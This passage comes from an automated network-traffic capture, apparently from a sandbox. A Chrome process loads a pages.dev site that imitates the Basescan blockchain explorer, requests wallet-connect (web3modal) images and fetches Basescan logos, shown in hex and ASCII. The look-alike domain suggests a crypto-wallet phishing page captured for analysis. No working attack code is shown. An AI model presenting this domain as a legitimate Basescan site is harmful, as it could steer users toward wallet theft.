                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 68 61 6e 67 65 22 2c 20 73 74 61 74 65 48 61 6e 64 6c 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 73 74 61 74 65 48 61 6e 64 6c 65 28 29 22 2c 20 31 20 2a 20 31 30 30 30 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 74 61 74 65 48 61 6e 64 6c 65 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 70 49 6e 70 75 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 49 6e 70 75 74 22 29 2e 76 61 6c 75 65 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 71
                                                                                                                                                                                                                                              Data Ascii: dEventListener("change", stateHandle); setTimeout("stateHandle()", 1 * 1000); function stateHandle() { let pInput = document.getElementById("pInput").value; if (document.q
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC341INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 65 63 6f 6e 64 73 20 3d 20 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 66 72 61 6d 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 77 65 62 73 69 74 65 46 72 61 6d 65 22 20 73 72 63 3d 22 64 69 73 74 2f 77 65 62 73 69 74 65 2e 68 74 6d 6c
                                                                                                                                                                                                                                              Data Ascii: var seconds = 30; </script> </div> </div> </div> </div> </div> </div> <div class="iframe-container"> <iframe id="websiteFrame" src="dist/website.html
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              95192.168.2.549839104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC681OUTOPTIONS /getWalletImage/7677b54f-3486-46e2-4e37-bf8747814f00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC449INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2deff6143d0-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              96192.168.2.549838104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC681OUTOPTIONS /getWalletImage/45f2f08e-fc0c-4d62-3e63-404e72170500 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC449INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df2b441a0b-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              97192.168.2.549840104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC365OUTGET /images/logo-ether.svg?v=0.0.7 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC804INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                              Content-Length: 10250
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Mon, 15 May 2023 02:33:00 GMT
                                                                                                                                                                                                                                              ETag: "056d290d586d91:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 90409
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evIPGvBrsqiNHMS%2Bmt1Fq%2B7iaZsk0FW%2FfLFZy%2BDYq%2FY8zaow0yOpXiWiCinYjKnilhCvUnmiRrIc%2BYnPlfTscbWEEBuXYlT0w88dqbb1ZiXhjbia5nbjO7Gzjr3ugQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df0ddd4350-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC565INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 35 34 32 2e 32 34 39 22 20 68 65 69 67 68 74 3d 22 31 32 31 2e 31 35 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 32 2e 32 34 39 20 31 32 31 2e 31 35 32 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 65 74 68 65 72 73 63 61 6e 2d 6c 6f 67 6f 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 31 39 2e 33 37 37 20 2d 32 31 33 2e 35 31 36 29 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 50 61 74 68 5f 38 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 50 61 74 68 20 38 22 20 64 3d 22 4d 31 32 2e 33 33 33 2d 34 33 2e 39 71 30 2d 36 2e 30 38 34 2d 34 2e 31 39 33 2d 36 2e 30 38 34 61 36 2e 37 34 32
                                                                                                                                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="542.249" height="121.152" viewBox="0 0 542.249 121.152"> <g id="etherscan-logo" transform="translate(-219.377 -213.516)"> <path id="Path_8" data-name="Path 8" d="M12.333-43.9q0-6.084-4.193-6.084a6.742
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 32 37 34 2c 33 2e 35 33 35 71 30 2c 33 2e 31 32 34 2d 32 2e 39 36 2c 33 2e 31 32 34 74 2d 32 2e 39 36 2d 34 2e 33 37 38 76 2d 34 2e 33 71 30 2d 36 2e 39 33 38 2d 32 2e 38 36 37 2d 38 2e 31 37 38 2d 32 2e 31 33 31 2d 2e 39 30 38 2d 31 30 2e 39 38 2d 2e 39 30 38 61 34 39 2e 34 37 37 2c 34 39 2e 34 37 37 2c 30 2c 30 2c 30 2d 36 2e 38 38 33 2e 32 35 31 71 2d 33 2e 35 32 34 2e 39 31 39 2d 33 2e 35 32 34 2c 35 2e 30 31 31 76 38 2e 32 32 32 71 30 2c 33 2e 32 38 39 2c 31 2e 34 35 39 2c 33 2e 37 38 32 61 37 2e 39 31 2c 37 2e 39 31 2c 30 2c 30 2c 30 2c 31 2e 39 34 36 2e 31 36 34 48 32 35 2e 38 71 35 2e 31 30 39 2c 30 2c 35 2e 31 30 39 2d 33 2e 35 33 35 61 32 30 2e 33 35 37 2c 32 30 2e 33 35 37 2c 30 2c 30 2c 30 2d 2e 32 30 36 2d
                                                                                                                                                                                                                                              Data Ascii: .313,0,0,1,.274,3.535q0,3.124-2.96,3.124t-2.96-4.378v-4.3q0-6.938-2.867-8.178-2.131-.908-10.98-.908a49.477,49.477,0,0,0-6.883.251q-3.524.919-3.524,5.011v8.222q0,3.289,1.459,3.782a7.91,7.91,0,0,0,1.946.164H25.8q5.109,0,5.109-3.535a20.357,20.357,0,0,0-.206-
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 35 2c 32 2e 36 31 39 2c 32 2e 36 31 39 2c 30 2c 30 2c 31 2c 31 2e 39 33 32 2d 2e 39 68 33 2e 32 30 37 71 31 2e 34 2c 30 2c 31 2e 34 2d 31 2e 35 36 32 76 2d 38 2e 34 36 39 71 30 2d 33 2e 31 32 34 2c 33 2e 32 30 37 2d 33 2e 31 32 34 2c 32 2e 39 36 2c 30 2c 32 2e 39 36 2c 33 2e 31 32 34 76 38 2e 38 71 30 2c 31 2e 32 33 33 2c 31 2e 34 38 2c 31 2e 32 33 33 48 38 30 71 33 2e 31 32 34 2c 30 2c 33 2e 31 32 34 2c 32 2e 38 37 38 2c 30 2c 33 2e 30 34 32 2d 33 2e 33 37 31 2c 33 2e 30 34 32 48 37 30 2e 37 30 38 71 2d 31 2e 31 35 31 2c 30 2d 31 2e 31 35 31 2c 31 2e 37 32 37 76 32 30 2e 32 32 36 71 30 2c 38 2e 36 33 33 2c 35 2e 37 35 33 2c 38 2e 36 33 33 51 38 31 2e 31 34 36 2d 34 2e 33 35 38 2c 38 31 2e 34 2d 31 31 2e 33 34 36 5a 6d 32 32 2e 38 35 37 2d 34 31 2e 36 37
                                                                                                                                                                                                                                              Data Ascii: 5,2.619,2.619,0,0,1,1.932-.9h3.207q1.4,0,1.4-1.562v-8.469q0-3.124,3.207-3.124,2.96,0,2.96,3.124v8.8q0,1.233,1.48,1.233H80q3.124,0,3.124,2.878,0,3.042-3.371,3.042H70.708q-1.151,0-1.151,1.727v20.226q0,8.633,5.753,8.633Q81.146-4.358,81.4-11.346Zm22.857-41.67
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 37 2e 32 34 37 2c 39 2e 32 30 36 2c 39 2e 32 30 36 2c 30 2c 30 2c 31 2d 31 2e 38 30 39 2e 32 34 37 71 2d 32 2e 38 2c 30 2d 32 2e 38 2d 32 2e 36 33 31 61 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 2e 39 38 37 2d 31 2e 39 37 33 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 31 2c 32 2e 33 38 34 2d 2e 38 32 32 71 2e 34 31 31 2c 30 2c 32 2e 38 2e 32 34 37 61 33 32 2e 32 39 32 2c 33 32 2e 32 39 32 2c 30 2c 30 2c 30 2c 33 2e 33 37 31 2e 31 36 34 2c 31 34 2e 32 30 38 2c 31 34 2e 32 30 38 2c 30 2c 30 2c 30 2c 32 2e 30 35 35 2d 2e 32 30 36 2c 31 33 2e 39 38 35 2c 31 33 2e 39 38 35 2c 30 2c 30 2c 31 2c 31 2e 38 39 31 2d 2e 32 30 36 71 31 2e 38 39 31 2c 30 2c 31 2e 38 39 31 2c 32 2e 37 32 35 5a 6d 37 36 2e 38 37 34 2c 32 38 2e 37 38 61 31 30 2e 30 31 37 2c 31 30 2e 30
                                                                                                                                                                                                                                              Data Ascii: 7.247,9.206,9.206,0,0,1-1.809.247q-2.8,0-2.8-2.631a2.49,2.49,0,0,1,.987-1.973,3.6,3.6,0,0,1,2.384-.822q.411,0,2.8.247a32.292,32.292,0,0,0,3.371.164,14.208,14.208,0,0,0,2.055-.206,13.985,13.985,0,0,1,1.891-.206q1.891,0,1.891,2.725Zm76.874,28.78a10.017,10.0
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 38 36 2c 32 2e 35 37 32 2c 34 2e 36 38 36 61 39 2e 35 2c 39 2e 35 2c 30 2c 30 2c 30 2c 32 2e 32 33 39 2d 2e 32 38 31 41 37 2e 31 32 37 2c 37 2e 31 32 37 2c 30 2c 30 2c 31 2c 32 30 37 2d 35 2e 31 71 32 2e 36 35 35 2c 30 2c 32 2e 36 35 35 2c 32 2e 35 39 31 2c 30 2c 32 2e 38 33 35 2d 33 2e 33 37 31 2c 32 2e 38 33 35 68 2d 2e 33 32 39 61 33 36 2e 31 32 38 2c 33 36 2e 31 32 38 2c 30 2c 30 2c 31 2d 33 2e 37 34 31 2d 2e 32 38 38 2c 33 36 2e 31 32 38 2c 33 36 2e 31 32 38 2c 30 2c 30 2c 30 2d 33 2e 37 34 31 2d 2e 32 38 38 71 2d 33 2e 32 38 39 2c 30 2d 35 2e 31 38 2e 31 36 34 6c 2d 34 2e 36 2e 34 31 31 71 2d 33 2e 33 37 31 2c 30 2d 33 2e 33 37 31 2d 32 2e 38 37 38 2c 30 2d 32 2e 35 34 39 2c 33 2e 31 35 33 2d 32 2e 35 34 39 61 36 2e 39 33 38 2c 36 2e 39 33 38 2c 30
                                                                                                                                                                                                                                              Data Ascii: 86,2.572,4.686a9.5,9.5,0,0,0,2.239-.281A7.127,7.127,0,0,1,207-5.1q2.655,0,2.655,2.591,0,2.835-3.371,2.835h-.329a36.128,36.128,0,0,1-3.741-.288,36.128,36.128,0,0,0-3.741-.288q-3.289,0-5.18.164l-4.6.411q-3.371,0-3.371-2.878,0-2.549,3.153-2.549a6.938,6.938,0
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 2c 30 2c 30 2c 31 2c 32 33 33 2e 32 35 34 2d 31 32 71 2e 30 38 32 2c 33 2e 35 33 35 2c 33 2e 37 2c 35 2e 37 35 35 61 31 37 2e 33 35 37 2c 31 37 2e 33 35 37 2c 30 2c 30 2c 30 2c 39 2e 32 30 38 2c 32 2e 32 32 2c 31 30 2e 34 39 32 2c 31 30 2e 34 39 32 2c 30 2c 30 2c 30 2c 36 2e 36 36 2d 32 2e 30 35 35 2c 36 2e 33 31 35 2c 36 2e 33 31 35 2c 30 2c 30 2c 30 2c 32 2e 36 33 31 2d 35 2e 31 38 71 30 2d 35 2e 35 39 31 2d 38 2e 38 38 2d 36 2e 35 2d 38 2e 34 36 39 2d 2e 39 2d 31 32 2e 39 30 38 2d 33 2e 33 33 74 2d 34 2e 34 34 2d 38 2e 35 31 61 31 31 2e 35 31 33 2c 31 31 2e 35 31 33 2c 30 2c 30 2c 31 2c 34 2e 33 34 33 2d 39 2e 33 33 32 71 34 2e 33 34 34 2d 33 2e 35 37 35 2c 31 31 2e 33 31 2d 33 2e 35 37 35 5a 6d 34 37 2e 30 38 2c 31 35 2e 33 37 35 71 30 2d 33 2e 32 38
                                                                                                                                                                                                                                              Data Ascii: ,0,0,1,233.254-12q.082,3.535,3.7,5.755a17.357,17.357,0,0,0,9.208,2.22,10.492,10.492,0,0,0,6.66-2.055,6.315,6.315,0,0,0,2.631-5.18q0-5.591-8.88-6.5-8.469-.9-12.908-3.33t-4.44-8.51a11.513,11.513,0,0,1,4.343-9.332q4.344-3.575,11.31-3.575Zm47.08,15.375q0-3.28
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 2c 34 2e 37 38 36 2c 30 2c 30 2c 31 2d 33 2e 35 37 37 2d 31 2e 34 38 2c 34 2e 39 39 34 2c 34 2e 39 39 34 2c 30 2c 30 2c 31 2d 31 2e 34 33 39 2d 33 2e 36 31 38 71 30 2d 34 2e 36 2c 34 2e 35 36 33 2d 37 2e 38 39 33 41 31 38 2e 34 30 38 2c 31 38 2e 34 30 38 2c 30 2c 30 2c 31 2c 33 32 37 2e 37 32 35 2d 34 32 2e 35 71 31 34 2e 39 36 34 2c 30 2c 31 34 2e 39 36 34 2c 31 34 2e 33 35 37 76 31 36 2e 35 37 33 61 33 35 2c 33 35 2c 30 2c 30 2c 30 2c 2e 31 36 34 2c 34 2e 36 37 36 71 2e 34 39 33 2c 32 2e 38 37 31 2c 32 2e 38 2c 32 2e 38 37 31 2c 32 2e 38 37 38 2c 30 2c 32 2e 38 37 38 2d 35 2e 32 32 36 76 2d 34 71 30 2d 32 2e 36 31 33 2c 32 2e 35 30 39 2d 32 2e 36 31 33 2c 32 2e 36 37 31 2c 30 2c 32 2e 36 37 31 2c 33 2e 39 34 36 76 35 2e 31 71 2d 2e 31 37 31 2c 37 2e 38
                                                                                                                                                                                                                                              Data Ascii: ,4.786,0,0,1-3.577-1.48,4.994,4.994,0,0,1-1.439-3.618q0-4.6,4.563-7.893A18.408,18.408,0,0,1,327.725-42.5q14.964,0,14.964,14.357v16.573a35,35,0,0,0,.164,4.676q.493,2.871,2.8,2.871,2.878,0,2.878-5.226v-4q0-2.613,2.509-2.613,2.671,0,2.671,3.946v5.1q-.171,7.8
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 37 35 2d 2e 34 39 33 61 32 39 2e 39 38 35 2c 32 39 2e 39 38 35 2c 30 2c 30 2c 30 2d 34 2e 30 32 39 2d 2e 32 34 37 2c 34 32 2e 36 33 38 2c 34 32 2e 36 33 38 2c 30 2c 30 2c 30 2d 34 2e 36 2e 33 32 39 71 2d 33 2e 36 31 38 2e 34 31 31 2d 34 2e 31 31 31 2e 34 31 31 2d 33 2e 34 35 33 2c 30 2d 33 2e 34 35 33 2d 32 2e 38 61 32 2e 33 34 37 2c 32 2e 33 34 37 2c 30 2c 30 2c 31 2c 2e 36 38 32 2d 31 2e 39 38 36 2c 32 2e 33 34 37 2c 32 2e 33 34 37 2c 30 2c 30 2c 31 2c 32 2d 2e 36 34 35 2c 38 2e 38 34 32 2c 38 2e 38 34 32 2c 30 2c 30 2c 31 2c 31 2e 35 34 39 2e 32 34 37 2c 31 30 2e 33 38 39 2c 31 30 2e 33 38 39 2c 30 2c 30 2c 30 2c 32 2e 32 31 39 2e 32 34 37 71 32 2e 35 31 33 2c 30 2c 32 2e 36 2d 34 2e 37 36 39 56 2d 33 31 2e 33 32 35 61 31 30 2e 34 37 36 2c 31 30 2e 34
                                                                                                                                                                                                                                              Data Ascii: 75-.493a29.985,29.985,0,0,0-4.029-.247,42.638,42.638,0,0,0-4.6.329q-3.618.411-4.111.411-3.453,0-3.453-2.8a2.347,2.347,0,0,1,.682-1.986,2.347,2.347,0,0,1,2-.645,8.842,8.842,0,0,1,1.549.247,10.389,10.389,0,0,0,2.219.247q2.513,0,2.6-4.769V-31.325a10.476,10.4
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC102INData Raw: 35 32 2d 32 32 2e 31 36 33 2c 33 33 2e 30 35 35 2d 36 33 2e 30 38 35 2c 34 38 2e 35 30 38 2d 39 36 2e 31 38 31 2c 35 33 2e 32 31 33 22 20 66 69 6c 6c 3d 22 23 39 37 39 36 39 35 22 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 67 3e 0d 0a 20 20 20 20 3c 2f 67 3e 0d 0a 20 20 3c 2f 67 3e 0d 0a 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 52-22.163,33.055-63.085,48.508-96.181,53.213" fill="#979695"/> </g> </g> </g></svg>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              98192.168.2.549844104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC358OUTGET /images/logo-symbol.svg HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC801INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                              Content-Length: 340
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Thu, 16 Feb 2023 04:39:00 GMT
                                                                                                                                                                                                                                              ETag: "0ca9496c041d91:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 119856
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FIwXqiE0IaYwycextSNv4%2BEeJP%2Btzr9hTG%2FMS46mvXl8yssZ7ID%2BsUcDhVx0jQiRlOsQCGpyIhHAo%2BFrwquPb3pvvheu1Ye4Dx601E01Wu1UoomX0go7dkBdGCgvXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df5df14328-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC340INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 38 22 20 68 65 69 67 68 74 3d 22 31 32 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 20 31 32 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 32 38 20 36 34 43 31 32 38 20 39 39 2e 33 34 36 32 20 39 39 2e 32 39 36 31 20 31 32 38 20 36 33 2e 38 38 38 33 20 31 32 38 43 33 30 2e 32 39 35 35 20 31 32 38 20 32 2e 37 33 36 39 37 20 31 30 32 2e 32 30 38 20 30 20 36 39 2e 33 37 39 37 48 38 34 2e 37 34 30 39 56 35 38 2e 36 32 30 32 48 30 43 32 2e 37 33 36 39
                                                                                                                                                                                                                                              Data Ascii: <svg width="128" height="128" viewBox="0 0 128 128" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M128 64C128 99.3462 99.2961 128 63.8883 128C30.2955 128 2.73697 102.208 0 69.3797H84.7409V58.6202H0C2.7369


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              99192.168.2.549845104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC363OUTGET /images/main/empty-token.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC848INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 6167
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
